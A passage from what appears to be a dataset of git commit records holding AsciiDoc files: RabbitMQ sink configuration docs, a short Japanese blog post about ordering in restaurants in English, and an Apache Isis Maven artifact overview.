to an exchange name.$$ *($$Expression$$, default: `<none>`)*\n$$rabbit.mapped-request-headers$$:: $$Headers that will be mapped.$$ *($$String[]$$, default: **)\n$$rabbit.persistent-delivery-mode$$:: $$Default delivery mode when 'amqp_deliveryMode' header is not present,\n true for PERSISTENT.$$ *($$Boolean$$, default: `false`)*\n$$rabbit.routing-key$$:: $$Routing key - overridden by routingKeyExpression, if supplied.$$ *($$String$$, default: `<none>`)*\n$$rabbit.routing-key-expression$$:: $$A SpEL expression that evaluates to a routing key.$$ *($$Expression$$, default: `<none>`)*\n$$spring.rabbitmq.addresses$$:: $$Comma-separated list of addresses to which the client should connect to.$$ *($$String$$, default: `<none>`)*\n$$spring.rabbitmq.host$$:: $$RabbitMQ host.$$ *($$String$$, default: `localhost`)*\n$$spring.rabbitmq.password$$:: $$Login to authenticate against the broker.$$ *($$String$$, default: `<none>`)*\n$$spring.rabbitmq.port$$:: $$RabbitMQ port.$$ *($$Integer$$, default: `5672`)*\n$$spring.rabbitmq.requested-heartbeat$$:: $$Requested heartbeat timeout, in seconds; zero for none.$$ *($$Integer$$, default: `<none>`)*\n$$spring.rabbitmq.username$$:: $$Login user to authenticate to the broker.$$ *($$String$$, default: `<none>`)*\n$$spring.rabbitmq.virtual-host$$:: $$Virtual host to use when connecting to the broker.$$ *($$String$$, default: `<none>`)*\n\/\/end::configuration-properties[]\n\nNOTE: By default, the message converter is a `SimpleMessageConverter` which handles `byte[]`, `String` and\n`java.io.Serializable`.\nA well-known bean name `jsonConverter` will configure a `Jackson2JsonMessageConverter` instead.\nIn addition, a custom converter bean can be added to the context and referenced by the $$converterBeanName$$ property.\n\n\/\/end::ref-doc[]\n\n== Build\n\n```\n$ mvn clean package\n```\n","old_contents":"\/\/tag::ref-doc[]\n= RabbitMQ Sink\n\nThis module sends messages to RabbitMQ.\n\n== Options\n\nThe **$$rabbit$$** $$sink$$ has the following options:\n\n(See the Spring Boot documentation for RabbitMQ connection properties)\n\n\/\/tag::configuration-properties[]\n$$rabbit.converter-bean-name$$:: $$The bean name for a custom message converter; if omitted, a SimpleMessageConverter is used.\n If 'jsonConverter', a Jackson2JsonMessageConverter bean will be created for you.$$ *($$String$$, default: `<none>`)*\n$$rabbit.exchange$$:: $$Exchange name - overridden by exchangeNameExpression, if supplied.$$ *($$String$$, default: `<empty string>`)*\n$$rabbit.exchange-expression$$:: $$A SpEL expression that evaluates to an exchange name.$$ *($$Expression$$, default: `<none>`)*\n$$rabbit.mapped-request-headers$$:: $$Headers that will be mapped.$$ *($$String[]$$, default: `[*]`)*\n$$rabbit.persistent-delivery-mode$$:: $$Default delivery mode when 'amqp_deliveryMode' header is not present,\n true for PERSISTENT.$$ *($$Boolean$$, default: `false`)*\n$$rabbit.routing-key$$:: $$Routing key - overridden by routingKeyExpression, if supplied.$$ *($$String$$, default: `<none>`)*\n$$rabbit.routing-key-expression$$:: $$A SpEL expression that evaluates to a routing key.$$ *($$Expression$$, default: `<none>`)*\n$$spring.rabbitmq.addresses$$:: $$Comma-separated list of addresses to which the client should connect to.$$ *($$String$$, default: `<none>`)*\n$$spring.rabbitmq.host$$:: $$RabbitMQ host.$$ *($$String$$, default: `localhost`)*\n$$spring.rabbitmq.password$$:: $$Login to authenticate against the broker.$$ *($$String$$, default: `<none>`)*\n$$spring.rabbitmq.port$$:: $$RabbitMQ port.$$ 
*($$Integer$$, default: `5672`)*\n$$spring.rabbitmq.requested-heartbeat$$:: $$Requested heartbeat timeout, in seconds; zero for none.$$ *($$Integer$$, default: `<none>`)*\n$$spring.rabbitmq.username$$:: $$Login user to authenticate to the broker.$$ *($$String$$, default: `<none>`)*\n$$spring.rabbitmq.virtual-host$$:: $$Virtual host to use when connecting to the broker.$$ *($$String$$, default: `<none>`)*\n\/\/end::configuration-properties[]\n\nNOTE: By default, the message converter is a `SimpleMessageConverter` which handles `byte[]`, `String` and\n`java.io.Serializable`.\nA well-known bean name `jsonConverter` will configure a `Jackson2JsonMessageConverter` instead.\nIn addition, a custom converter bean can be added to the context and referenced by the $$converterBeanName$$ property.\n\n\/\/end::ref-doc[]\n\n== Build\n\n```\n$ mvn clean package\n```\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73dbd64535a41d4d02df43631ee507a294893138","subject":"Update 2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","message":"Update 2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","new_file":"_posts\/2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","new_contents":"= \u30ec\u30b9\u30c8\u30e9\u30f3\u3067\u6ce8\u6587\u3063\u3066\u57fa\u672c\u7684\u306a\u4f1a\u8a71\u306a\u306e\u306b\u610f\u5916\u3068\u96e3\u3057\u3044\u3088\u306d\u3002\n:hp-alt-title: I found it diffcult to order in a restaurant.\n\n\u57fa\u672c\u3058\u3083\u3093\uff1f\u306a\u3093\u304b\u3053\u3046\u82f1\u4f1a\u8a71\u3063\u3066\u305d\u3046\u3044\u3046\u306e\u3084\u308b\u30a4\u30e1\u30fc\u30b8\u3042\u308b\u3058\u3083\u3093\uff1f\n\n\u3067\u3002\n\n\u3044\u3056\u884c\u304f\u3068\u3002\n\n\u306a\u304b\u306a\u304b\u96e3\u3057\u3044\u3002\n\n\n:hp-tags:English\n","old_contents":"= \u30ec\u30b9\u30c8\u30e9\u30f3\u3067\u6ce8\u6587\u3063\u3066\u57fa\u672c\u7684\u306a\u4f1a\u8a71\u306a\u306e\u306b\u610f\u5916\u3068\u96e3\u3057\u3044\u3088\u306d\u3002\n:hp-alt-title: I found it diffcult to order in a restaurant.\n\n\u57fa\u672c\u3058\u3083\u3093\uff1f\u306a\u3093\u304b\u3053\u3046\u82f1\u4f1a\u8a71\u3063\u3066\u305d\u3046\u3044\u3046\u306e\u3084\u308b\u30a4\u30e1\u30fc\u30b8\u3042\u308b\u3058\u3083\u3093\uff1f\n\n\u3067\u3002\n\n\u3044\u3056\u884c\u304f\u3068\u3002\n\n\u306a\u304b\u306a\u304b\u96e3\u3057\u3044\u3002\n\n\n:hp-tags:\u82f1\u8a9e\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b7cfe9e0780f74f386ba15efac502ac06d537678","subject":"ISIS-2444: regen projdoc","message":"ISIS-2444: regen projdoc\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/refguide-index\/modules\/_overview\/pages\/about.adoc","new_file":"antora\/components\/refguide-index\/modules\/_overview\/pages\/about.adoc","new_contents":"= System Overview\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . 
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\nThese tables summarize all Maven artifacts available with _Apache Isis_.\n\n== App\n\n[plantuml,App,svg]\n----\n@startuml(id=App)\ntitle App - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"App\\n[Software System]\" {\n rectangle \"==Apache Isis Starter Parent\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (App)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Starter Parent\n[source,yaml]\n----\nGroup: org.apache.isis.app\nArtifact: isis-app-starter-parent\nType: pom\nDirectory: \/starters\n----\n|Parent pom providing dependency and plugin management for Apache Isis applications\nbuilt with Maven. Builds on top of spring-boot-starter-parent.\n|===\n\n== Mavendeps\n\n[plantuml,Mavendeps,svg]\n----\n@startuml(id=Mavendeps)\ntitle Mavendeps - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Mavendeps\\n[Software System]\" {\n rectangle \"==Apache Isis Maven Deps\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Maven Deps - BDD Integ Spec\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Maven Deps - Integration Testing\\n<size:10>[Container: packaging: pom]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Maven Deps - JDK11\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Maven Deps - JDO\\n<size:10>[Container: packaging: pom]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Maven Deps - JPA\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Maven Deps - Testing\\n<size:10>[Container: packaging: pom]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Maven Deps - Webapp\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 8 : \"\"\n2 .[#707070].> 9 : 
\"\"\n@enduml\n----\n.Projects\/Modules (Mavendeps)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Maven Deps\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps\nType: pom\nDirectory: \/mavendeps\n----\n|Collection of Apache Isis Maven Dependency Bundles.\n\n|Apache Isis Maven Deps - BDD Integ Spec\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-integspecs\nType: pom\nDirectory: \/mavendeps\/integspecs\n----\n|Defines a module that can be used as a single dependency for BDD (Cucumber) specs as integration tests.\n\n.Dependencies\n****\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-specsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - Integration Testing\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-integtests\nType: pom\nDirectory: \/mavendeps\/integtests\n----\n|Defines a module that can be used as a single dependency for integration tests.\n\n.Dependencies\n****\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - JDK11\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-jdk11\nType: pom\nDirectory: \/mavendeps\/jdk11\n----\n|Defines a module to bring in dependencies that were part of JDK 8 but\nhad been removed with JDK 11+. These dependencies are activated when the\nconsuming project is built with JDK 11 or higher.\n\n|Apache Isis Maven Deps - JDO\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-jdo\nType: pom\nDirectory: \/mavendeps\/jdo\n----\n|Defines a module that provides the default JDO persistence layer integration\nfor running an Apache Isis webapp (Wicket, Restful Objects and Shiro security).\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - JPA\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-jpa\nType: pom\nDirectory: \/mavendeps\/jpa\n----\n|Defines a module that provides the default JPA persistence layer integration\nfor running an Apache Isis webapp (Wicket, Restful Objects and Shiro security).\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-eclipselink:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - Testing\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-unittests\nType: pom\nDirectory: \/mavendeps\/unittests\n----\n|Defines a module that can be used as a single dependency for a set of common testing libraries.\n\n.Dependencies\n****\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - Webapp\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-webapp\nType: pom\nDirectory: \/mavendeps\/webapp\n----\n|Defines a module that can be almost used as a single dependency for running\nan Apache Isis webapp (Wicket, 
\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.security:isis-security-bypass:jar:<managed> +\norg.apache.isis.security:isis-security-keycloak:jar:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-jaxrsresteasy4:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-viewer:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-viewer:jar:<managed> +\norg.springframework.boot:spring-boot-starter-tomcat:jar:<managed> +\norg.springframework.boot:spring-boot-starter-web:jar:<managed> +\n****\n|===\n\n== Testing\n\n[plantuml,Testing,svg]\n----\n@startuml(id=Testing)\ntitle Testing - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<13>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<14>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<15>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<16>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<17>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<18>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Testing\\n[Software System]\" {\n rectangle \"==Apache Isis Testing\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Tst - FakeData (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Tst - FakeData (fixtures)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Tst - FakeData (integ tests)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Tst - FakeData (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Tst - Fixtures (applib)\\n<size:10>[Container: 
packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Tst - Fixtures (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Tst - H2 Console (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Tst - H2 Console (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Tst - HSQLDB Manager\\n<size:10>[Container: packaging: jar]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Tst - HSQLDB Manager (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Tst - Integ Test Support (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<14>> as 14\n rectangle \"==Apache Isis Tst - Integ Test Support (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<13>> as 13\n rectangle \"==Apache Isis Tst - Spec\/Cucumber (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<16>> as 16\n rectangle \"==Apache Isis Tst - Spec\/Cucumber (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<15>> as 15\n rectangle \"==Apache Isis Tst - Unit Test Support (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<18>> as 18\n rectangle \"==Apache Isis Tst - Unit Test Support (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<17>> as 17\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 11 : \"\"\n2 .[#707070].> 13 : \"\"\n2 .[#707070].> 15 : \"\"\n2 .[#707070].> 17 : \"\"\n3 .[#707070].> 4 : \"\"\n3 .[#707070].> 5 : \"\"\n3 .[#707070].> 6 : \"\"\n7 .[#707070].> 8 : \"\"\n9 .[#707070].> 10 : \"\"\n11 .[#707070].> 12 : \"\"\n13 .[#707070].> 14 : \"\"\n15 .[#707070].> 16 : \"\"\n17 .[#707070].> 18 : \"\"\n@enduml\n----\n.Projects\/Modules (Testing)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Testing\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing\nType: pom\nDirectory: \/testing\n----\n|A library of utilities, mini-frameworks and tools for prototyping and testing Apache Isis applications.\n\n|Apache Isis Tst - FakeData (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata\nType: pom\nDirectory: \/testing\/fakedata\n----\n|A module providing a domain service to generate fake random data\nfor use in unit tests or integration tests.\n\n|Apache Isis Tst - FakeData (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata-applib\nType: jar\nDirectory: \/testing\/fakedata\/applib\n----\n|.Components\n****\no.a.i.testing.fakedata.applib.services.FakeDataService +\n****\n\n.Dependencies\n****\ncom.github.javafaker:javafaker:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/fakedata\/applib\/IsisModuleTestingFakeDataApplib.adoc[IsisModuleTestingFakeDataApplib], xref:refguide:testing:index\/fakedata\/applib\/services\/AbstractRandomValueGenerator.adoc[AbstractRandomValueGenerator], xref:refguide:testing:index\/fakedata\/applib\/services\/Addresses.adoc[Addresses], xref:refguide:testing:index\/fakedata\/applib\/services\/BigDecimals.adoc[BigDecimals], xref:refguide:testing:index\/fakedata\/applib\/services\/BigIntegers.adoc[BigIntegers], 
xref:refguide:testing:index\/fakedata\/applib\/services\/Books.adoc[Books], xref:refguide:testing:index\/fakedata\/applib\/services\/Booleans.adoc[Booleans], xref:refguide:testing:index\/fakedata\/applib\/services\/Bytes.adoc[Bytes], xref:refguide:testing:index\/fakedata\/applib\/services\/Chars.adoc[Chars], xref:refguide:testing:index\/fakedata\/applib\/services\/Collections.adoc[Collections], xref:refguide:testing:index\/fakedata\/applib\/services\/Comms.adoc[Comms], xref:refguide:testing:index\/fakedata\/applib\/services\/CreditCards.adoc[CreditCards], xref:refguide:testing:index\/fakedata\/applib\/services\/Doubles.adoc[Doubles], xref:refguide:testing:index\/fakedata\/applib\/services\/Enums.adoc[Enums], xref:refguide:testing:index\/fakedata\/applib\/services\/FakeDataService.adoc[FakeDataService], xref:refguide:testing:index\/fakedata\/applib\/services\/Floats.adoc[Floats], xref:refguide:testing:index\/fakedata\/applib\/services\/Integers.adoc[Integers], xref:refguide:testing:index\/fakedata\/applib\/services\/IsisBlobs.adoc[IsisBlobs], xref:refguide:testing:index\/fakedata\/applib\/services\/IsisClobs.adoc[IsisClobs], xref:refguide:testing:index\/fakedata\/applib\/services\/IsisPasswords.adoc[IsisPasswords], xref:refguide:testing:index\/fakedata\/applib\/services\/J8DateTimes.adoc[J8DateTimes], xref:refguide:testing:index\/fakedata\/applib\/services\/J8LocalDates.adoc[J8LocalDates], xref:refguide:testing:index\/fakedata\/applib\/services\/J8Periods.adoc[J8Periods], xref:refguide:testing:index\/fakedata\/applib\/services\/JavaSqlDates.adoc[JavaSqlDates], xref:refguide:testing:index\/fakedata\/applib\/services\/JavaSqlTimestamps.adoc[JavaSqlTimestamps], xref:refguide:testing:index\/fakedata\/applib\/services\/JavaUtilDates.adoc[JavaUtilDates], xref:refguide:testing:index\/fakedata\/applib\/services\/JodaDateTimes.adoc[JodaDateTimes], xref:refguide:testing:index\/fakedata\/applib\/services\/JodaLocalDates.adoc[JodaLocalDates], xref:refguide:testing:index\/fakedata\/applib\/services\/JodaPeriods.adoc[JodaPeriods], xref:refguide:testing:index\/fakedata\/applib\/services\/Longs.adoc[Longs], xref:refguide:testing:index\/fakedata\/applib\/services\/Lorem.adoc[Lorem], xref:refguide:testing:index\/fakedata\/applib\/services\/Names.adoc[Names], xref:refguide:testing:index\/fakedata\/applib\/services\/Shorts.adoc[Shorts], xref:refguide:testing:index\/fakedata\/applib\/services\/Strings.adoc[Strings], xref:refguide:testing:index\/fakedata\/applib\/services\/Urls.adoc[Urls], xref:refguide:testing:index\/fakedata\/applib\/services\/Uuids.adoc[Uuids]\n****\n\n|Apache Isis Tst - FakeData (fixtures)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata-fixtures\nType: jar\nDirectory: \/testing\/fakedata\/fixtures\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Tst - FakeData (integ tests)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata-integtests\nType: jar\nDirectory: \/testing\/fakedata\/integtests\n----\n|.Dependencies\n****\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> 
+\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fakedata-fixtures:jar:<managed> +\n****\n\n|Apache Isis Tst - Fixtures (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fixtures\nType: pom\nDirectory: \/testing\/fixtures\n----\n|Library to initialize the system under test, either for integration testing or for prototyping.\n\n|Apache Isis Tst - Fixtures (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fixtures-applib\nType: jar\nDirectory: \/testing\/fixtures\/applib\n----\n|.Components\n****\no.a.i.testing.fixtures.applib.fixturescripts.ExecutionParametersService +\no.a.i.testing.fixtures.applib.modules.ModuleWithFixturesService +\no.a.i.testing.fixtures.applib.queryresultscache.QueryResultsCacheControlDefault +\no.a.i.testing.fixtures.applib.services.FixturesLifecycleService +\n****\n\n.Dependencies\n****\njoda-time:joda-time:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\norg.apache.isis.subdomains:isis-subdomains-spring-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Tst - H2 Console (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-h2console\nType: pom\nDirectory: \/testing\/h2console\n----\n|Menu and configuration to open up H2 Console\n\n|Apache Isis Tst - H2 Console (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-h2console-ui\nType: jar\nDirectory: \/testing\/h2console\/ui\n----\n|.Components\n****\no.a.i.testing.h2console.ui.webmodule.WebModuleH2Console +\n****\n\n.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/h2console\/ui\/IsisModuleTestingH2ConsoleUi.adoc[IsisModuleTestingH2ConsoleUi], xref:refguide:testing:index\/h2console\/ui\/services\/H2ManagerMenu.adoc[H2ManagerMenu], xref:refguide:testing:index\/h2console\/ui\/webmodule\/WebModuleH2Console.adoc[WebModuleH2Console]\n****\n\n|Apache Isis Tst - HSQLDB Manager (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-hsqldbmgr\nType: pom\nDirectory: \/testing\/hsqldbmgr\n----\n|Menu and configuration to open up HSQLDB Manager\n\n|Apache Isis Tst - HSQLDB Manager\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-hsqldbmgr-ui\nType: jar\nDirectory: \/testing\/hsqldbmgr\/ui\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/hsqldbmgr\/dom\/IsisModuleExtHsqldbMgr.adoc[IsisModuleExtHsqldbMgr], xref:refguide:extensions:index\/hsqldbmgr\/dom\/services\/HsqlDbManagerMenu.adoc[HsqlDbManagerMenu]\n****\n\n|Apache Isis Tst - Integ Test Support (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-integtestsupport\nType: pom\nDirectory: \/testing\/integtestsupport\n----\n|Support for writing integ tests in JUnit 5; should be added as a dependency with scope=test only\n\n|Apache Isis Tst - Integ Test Support (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-integtestsupport-applib\nType: jar\nDirectory: 
